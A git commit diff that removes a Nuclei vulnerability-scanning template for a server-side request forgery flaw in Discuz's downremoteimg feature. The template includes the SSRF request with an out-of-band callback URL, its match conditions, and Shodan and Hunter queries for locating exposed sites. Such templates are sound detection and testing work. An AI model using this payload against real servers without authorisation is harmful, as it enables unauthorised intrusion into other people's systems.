already in old PR
parent
a8a6aa15d1
commit
191dc51598
|
@ -1,34 +0,0 @@
|
|||
id: discuz-downremoteimg-ssrf
|
||||
|
||||
info:
|
||||
name: Discuz DownRemoteImg - Server-Side Request Forgery
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: Discuz DownRemoteImg - Server-Side Request Forgery
|
||||
reference:
|
||||
- https://cloud.tencent.com/developer/article/1511949
|
||||
- https://github.com/opensec-cn/kunpeng/blob/master/plugin/go/discuzSSRF.go
|
||||
metadata:
|
||||
shodan-query: title:"Powered by Discuz"
|
||||
hunter-query: web.body="Discuz! X3.1"
|
||||
tags: discuz,ssrf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/test?.jpg[/img]"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "ATTACHORIMAGE"
|
Loading…
Reference in New Issue